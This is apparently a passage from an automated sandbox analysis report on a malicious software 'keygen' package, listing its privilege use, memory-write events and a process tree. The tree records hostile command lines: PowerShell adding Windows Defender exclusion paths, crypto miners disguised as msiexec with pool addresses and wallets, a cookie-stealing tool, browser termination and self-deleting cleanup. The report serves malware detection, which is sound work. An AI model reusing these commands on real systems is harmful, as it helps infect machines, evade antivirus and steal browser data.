SeAssignPrimaryTokenPrivilege 2116 key.exe Token: SeImpersonatePrivilege 2116 key.exe Token: SeTcbPrivilege 2116 key.exe Token: SeChangeNotifyPrivilege 2116 key.exe Token: SeCreateTokenPrivilege 2116 key.exe Token: SeBackupPrivilege 2116 key.exe Token: SeRestorePrivilege 2116 key.exe Token: SeIncreaseQuotaPrivilege 2116 key.exe Token: SeAssignPrimaryTokenPrivilege 2116 key.exe Token: SeImpersonatePrivilege 2116 key.exe Token: SeTcbPrivilege 2116 key.exe Token: SeChangeNotifyPrivilege 2116 key.exe Token: SeCreateTokenPrivilege 2116 key.exe Token: SeBackupPrivilege 2116 key.exe Token: SeRestorePrivilege 2116 key.exe Token: SeIncreaseQuotaPrivilege 2116 key.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 720 setups.exe 792 setups.tmp 4408 MicrosoftEdge.exe 4812 MicrosoftEdgeCP.exe 4812 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 61 IoCs
description pid Process procid_target PID 652 wrote to memory of 1196 652 S.A.D.Formatwandler.360.keygen.by.Lz0.exe 77 PID 652 wrote to memory of 1196 652 S.A.D.Formatwandler.360.keygen.by.Lz0.exe 77 PID 652 wrote to memory of 1196 652 S.A.D.Formatwandler.360.keygen.by.Lz0.exe 77 PID 1196 wrote to memory of 2224 1196 cmd.exe 80 PID 1196 wrote to memory of 2224 1196 cmd.exe 80 PID 1196 wrote to memory of 2224 1196 cmd.exe 80 PID 1196 wrote to memory of 640 1196 cmd.exe 81 PID 1196 wrote to memory of 640 1196 cmd.exe 81 PID 1196 wrote to memory of 640 1196 cmd.exe 81 PID 1196 wrote to memory of 3516 1196 cmd.exe 82 PID 1196 wrote to memory of 3516 1196 cmd.exe 82 PID 1196 wrote to memory of 3516 1196 cmd.exe 82 PID 1196 wrote to memory of 1168 1196 cmd.exe 83 PID 1196 wrote to memory of 1168 1196 cmd.exe 83 PID 1196 wrote to memory of 1168 1196 cmd.exe 83 PID 1168 wrote to memory of 1364 1168 keygen-step-4.exe 84 PID 1168 wrote to memory of 1364 1168 keygen-step-4.exe 84 PID 2224 wrote to memory of 2116 2224 keygen-pr.exe 85 PID 2224 wrote to memory of 2116 2224 keygen-pr.exe 85 PID 2224 wrote to memory of 2116 2224 keygen-pr.exe 85 PID 3516 wrote to memory of 8 3516 keygen-step-3.exe 86 PID 3516 wrote to memory of 8 3516 keygen-step-3.exe 86 PID 3516 wrote to memory of 8 3516 keygen-step-3.exe 86 PID 2116 wrote to memory of 3900 2116 key.exe 87 PID 2116 wrote to memory of 3900 2116 key.exe 87 PID 2116 wrote to memory of 3900 2116 key.exe 87 PID 2116 wrote to memory of 3900 2116 key.exe 87 PID 2116 wrote to memory of 3900 2116 key.exe 87 PID 2116 wrote to memory of 3900 2116 key.exe 87 PID 2116 wrote to memory of 3900 2116 key.exe 87 PID 2116 wrote to memory of 3900 2116 key.exe 87 PID 2116 wrote to memory of 3900 2116 key.exe 87 PID 2116 wrote to memory of 3900 2116 key.exe 87 PID 2116 wrote to memory of 3900 2116 key.exe 87 PID 2116 wrote to memory of 3900 2116 key.exe 87 PID 2116 wrote to memory of 3900 2116 key.exe 87 PID 2116 wrote to memory of 3900 2116 key.exe 87 PID 2116 wrote to memory of 3900 2116 key.exe 87 PID 8 wrote to memory of 2860 8 cmd.exe 90 PID 8 wrote to memory of 2860 8 cmd.exe 90 PID 8 wrote to memory of 2860 8 cmd.exe 90 PID 1364 wrote to memory of 3020 1364 Setup.exe 92 PID 1364 wrote to memory of 3020 1364 Setup.exe 92 PID 1364 wrote to memory of 720 1364 Setup.exe 94 PID 1364 wrote to memory of 720 1364 Setup.exe 94 PID 1364 wrote to memory of 720 1364 Setup.exe 94 PID 1168 wrote to memory of 1844 1168 keygen-step-4.exe 95 PID 1168 wrote to memory of 1844 1168 keygen-step-4.exe 95 PID 1168 wrote to memory of 1844 1168 keygen-step-4.exe 95 PID 720 wrote to memory of 792 720 setups.exe 96 PID 720 wrote to memory of 792 720 setups.exe 96 PID 720 wrote to memory of 792 720 setups.exe 96 PID 1844 wrote to memory of 4184 1844 askinstall20.exe 98 PID 1844 wrote to memory of 4184 1844 askinstall20.exe 98 PID 1844 wrote to memory of 4184 1844 askinstall20.exe 98 PID 4184 wrote to memory of 4236 4184 cmd.exe 100 PID 4184 wrote to memory of 4236 4184 cmd.exe 100 PID 4184 wrote to memory of 4236 4184 cmd.exe 100 PID 1168 wrote to memory of 4596 1168 keygen-step-4.exe 104 PID 1168 wrote to memory of 4596 1168 keygen-step-4.exe 104 PID 1168 wrote to memory of 4596 1168 keygen-step-4.exe 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\S.A.D.Formatwandler.360.keygen.by.Lz0.exe"C:\Users\Admin\AppData\Local\Temp\S.A.D.Formatwandler.360.keygen.by.Lz0.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:652 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1196 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
PID:3900
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:640
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3516 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:8 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2860
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1168 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1364 -
C:\Users\Admin\AppData\Local\Temp\F0G447K8AT\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\F0G447K8AT\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3020 -
C:\Users\Admin\AppData\Local\Temp\F0G447K8AT\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\F0G447K8AT\multitimer.exe" 1 3.1616748980.605da1b4ac07e 1016⤵PID:5060
-
C:\Users\Admin\AppData\Local\Temp\F0G447K8AT\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\F0G447K8AT\multitimer.exe" 2 3.1616748980.605da1b4ac07e7⤵PID:2856
-
C:\Users\Admin\AppData\Local\Temp\vxvxfkota20\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\vxvxfkota20\Setup3310.exe" /Verysilent /subid=5778⤵PID:4256
-
C:\Users\Admin\AppData\Local\Temp\is-59USJ.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-59USJ.tmp\Setup3310.tmp" /SL5="$30296,138429,56832,C:\Users\Admin\AppData\Local\Temp\vxvxfkota20\Setup3310.exe" /Verysilent /subid=5779⤵PID:4664
-
C:\Users\Admin\AppData\Local\Temp\is-E0879.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-E0879.tmp\Setup.exe" /Verysilent10⤵PID:5532
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2ycgiy5pl5c\vict.exe"C:\Users\Admin\AppData\Local\Temp\2ycgiy5pl5c\vict.exe" /VERYSILENT /id=5358⤵PID:4204
-
C:\Users\Admin\AppData\Local\Temp\is-6LE58.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-6LE58.tmp\vict.tmp" /SL5="$60196,870426,780800,C:\Users\Admin\AppData\Local\Temp\2ycgiy5pl5c\vict.exe" /VERYSILENT /id=5359⤵PID:4576
-
C:\Users\Admin\AppData\Local\Temp\is-SMUPT.tmp\winhost.exe"C:\Users\Admin\AppData\Local\Temp\is-SMUPT.tmp\winhost.exe" 53510⤵PID:1108
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\502dt4nasgk\u4s2rqnzifk.exe"C:\Users\Admin\AppData\Local\Temp\502dt4nasgk\u4s2rqnzifk.exe" /VERYSILENT8⤵PID:4984
-
C:\Users\Admin\AppData\Local\Temp\is-RCJCN.tmp\u4s2rqnzifk.tmp"C:\Users\Admin\AppData\Local\Temp\is-RCJCN.tmp\u4s2rqnzifk.tmp" /SL5="$20250,2592217,780800,C:\Users\Admin\AppData\Local\Temp\502dt4nasgk\u4s2rqnzifk.exe" /VERYSILENT9⤵PID:4716
-
C:\Users\Admin\AppData\Local\Temp\is-JUVL0.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-JUVL0.tmp\winlthsth.exe"10⤵PID:4976
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 51611⤵
- Program crash
PID:5752
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4tbtvai5rzt\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\4tbtvai5rzt\AwesomePoolU1.exe"8⤵PID:4472
-
-
C:\Users\Admin\AppData\Local\Temp\bxr1eq3utzu\vpn.exe"C:\Users\Admin\AppData\Local\Temp\bxr1eq3utzu\vpn.exe" /silent /subid=4828⤵PID:4756
-
C:\Users\Admin\AppData\Local\Temp\is-6VME0.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-6VME0.tmp\vpn.tmp" /SL5="$50144,15170975,270336,C:\Users\Admin\AppData\Local\Temp\bxr1eq3utzu\vpn.exe" /silent /subid=4829⤵PID:2284
-
-
-
C:\Users\Admin\AppData\Local\Temp\d42vml1gtep\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\d42vml1gtep\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:4656
-
C:\Users\Admin\AppData\Local\Temp\is-FB9K7.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-FB9K7.tmp\IBInstaller_97039.tmp" /SL5="$102F4,9918015,721408,C:\Users\Admin\AppData\Local\Temp\d42vml1gtep\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:724
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://italyfabricone.club/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703910⤵PID:3716
-
-
C:\Users\Admin\AppData\Local\Temp\is-AB2Q3.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-AB2Q3.tmp\{app}\chrome_proxy.exe"10⤵PID:4972
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fyjrenhktnk\fo0g5bodxtn.exe"C:\Users\Admin\AppData\Local\Temp\fyjrenhktnk\fo0g5bodxtn.exe" /quiet SILENT=1 AF=7568⤵PID:5052
-
-
C:\Users\Admin\AppData\Local\Temp\lch4j0ncp42\j03dwlp0p5g.exe"C:\Users\Admin\AppData\Local\Temp\lch4j0ncp42\j03dwlp0p5g.exe" /1-6108⤵PID:4860
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Bold-Dust'9⤵PID:4736
-
-
-
C:\Users\Admin\AppData\Local\Temp\0slgfyk35fr\app.exe"C:\Users\Admin\AppData\Local\Temp\0slgfyk35fr\app.exe" /8-238⤵PID:4944
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Autumn-Violet'9⤵PID:4592
-
-
-
C:\Users\Admin\AppData\Local\Temp\dj4mefarcck\berjb4e0wuv.exe"C:\Users\Admin\AppData\Local\Temp\dj4mefarcck\berjb4e0wuv.exe" /ustwo INSTALL8⤵PID:5824
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\GY3M33K5KQ\setups.exe"C:\Users\Admin\AppData\Local\Temp\GY3M33K5KQ\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:720 -
C:\Users\Admin\AppData\Local\Temp\is-OBNE8.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-OBNE8.tmp\setups.tmp" /SL5="$2020E,383902,148480,C:\Users\Admin\AppData\Local\Temp\GY3M33K5KQ\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:792
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1844 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:4184 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4236
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵
- Executes dropped EXE
PID:4596
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵PID:5028
-
C:\Users\Admin\AppData\Roaming\EE2F.tmp.exe"C:\Users\Admin\AppData\Roaming\EE2F.tmp.exe"5⤵PID:4496
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:5180
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:5340
-
-
-
C:\Users\Admin\AppData\Roaming\E46A.tmp.exe"C:\Users\Admin\AppData\Roaming\E46A.tmp.exe"5⤵PID:4632
-
C:\Users\Admin\AppData\Roaming\E46A.tmp.exe"C:\Users\Admin\AppData\Roaming\E46A.tmp.exe"6⤵PID:5092
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"5⤵PID:4684
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:4136
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"4⤵PID:4844
-
C:\ProgramData\25660.exe"C:\ProgramData\25660.exe"5⤵PID:1640
-
-
C:\ProgramData\5479586.exe"C:\ProgramData\5479586.exe"5⤵PID:2936
-
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"6⤵PID:6032
-
-
-
C:\ProgramData\3351577.exe"C:\ProgramData\3351577.exe"5⤵PID:5268
-
-
C:\ProgramData\6235704.exe"C:\ProgramData\6235704.exe"5⤵PID:5312
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"4⤵PID:5384
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:5876
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4408
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:4476
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4812
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:4188
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:5732